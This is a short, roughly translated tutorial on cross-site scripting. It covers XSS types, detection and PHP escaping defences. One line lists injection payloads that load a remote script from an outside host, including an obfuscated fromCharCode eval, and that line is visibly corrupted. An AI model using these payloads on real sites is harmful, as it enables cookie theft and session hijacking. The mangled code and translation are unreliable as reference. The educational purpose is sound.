Xss: cross-site Scripting attacks, attackers, a piece of malicious code mosaic to the Web page, when users browse the page, the embedded page of malicious code will be executed, so as to reach the purpose of attacking Users.
The focus is on scripting, JavaScript and ActionScript
The previous attacks are generally classified into three categories: reflective xss, storage-type xss,dom XSS (and Flash xss, mxss). )
Important Introduction to Storage-type XSS
Harm:
Get Administrator's Cookie
Harpoon attack
Hanging Horse (puddle)
Wait a minute.
(1) there is an attacker-controlled parameter on the reflective xss,url, and when the server responds, the data is sent to the browser and Parsed. (not very Harmful)
(2) Storage-type xss, The attacker sends the code of the stored xss, is received and saved by the server, and all users who browse the information are xss.
(3) Domxss,dom typically represents objects in html, xhtml, and xml, and using the DOM allows programs and scripts to dynamically access and update the content, structure, and style of the Document. It does not require the direct involvement of the server parsing response, triggering XSS by the Browser-side Dom parsing, can be considered to be entirely a client thing.
4. Flash XSS
Using the flaw of the Flash file on the webpage to execute the JS script, it is generally reflective type XSS
Detection of XSS
The detection of XSS generally divided into two methods: one is manual detection, one is software auto-detect
Manual detection: Accurate test results, but time-consuming and laborious for large web
Software detection: Easy and labor-saving, but there is a false alarm, and there is write hidden XSS can not detect
The most important thing to detect XSS is to consider where there is input and where the input data is output
Storage-type XSS Steps
1. 手工检测
可得知输出位置: • 输入敏感字符,如“<、>、"、‘、()”等,然后在提交后查看html源代码,看这些字符是否被转义。 • 在输出这些字符时,程序可能已经进行了过滤,可以输入“AAAAAA<>"&‘()”字符串,然后查找AAAAAA或许比较方便。无法得知输出位置: 很多web应用程序源码不公开,在测试时不能的值输出位置,比如,有些留言本在留言后必须经过管理员审核才能显示,无法的值数据在后台管理页面处于何种状态,如: 在标签中:<div>XSS Test</div> 在属性内:<input type="text" name="content" value="XSS Test" /> 这种情况通常采用输入"/>XSS Test来测试。
2. Automatic detection of XSS
Software such as appscan, awvs, burp Suite can detect XSS effectively, They also detect other vulnerabilities, but they are less efficient than professional XSS detection tools.
Professional XSS scanning tools include well-known xsser, xssf, etc., as well as Web services (www.domxssscanner.com) that specialize in scanning Dom-type xss.
It is generally necessary to use manual and software, because some XSS software can not detect, as some messages need to enter the verification code, etc., tools can not do.
XSS is generally a closed tag, similar to SQL injection, Common payload are as Follows:
•<ScriptSrc=' Http://b.ioio.pub/xss/probe.js ' ></Script><ImgSrc=XOnerror="s=createelement (' script '); body.appendchild (s); s.src= ' http://b.ioio.pub/xss/probe.js '"; ><SvgOnload=S=createelement (' script '); body.appendchild (s); s.src= '/httpb.ioio.pub/xss/Probe.js><SvgOnload=Eval (string.fromcharcode (115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,50M115,41,59,115,46,115,114,99,61,39,104,116,98,111,111,117,.,,,,,,,,, 98,111,98, 101 , he, he, he, 106, ()) >
The defense of XSS 1. Filter input and Output (emphasis)
Convert some pre-defined characters to HTML entities using Hemlspecialchars () and Hemlentities ()
<?php @$html = $_GET[‘x‘]; if ($html){ echo htmlspecialchars($html); }?>
2. HttpOnly
HttpOnly does not protect against xss, it is to solve the XSS vulnerability after the cookie hijacking attack, it can effectively block XSS session hijacking Attacks.
Web Security XSS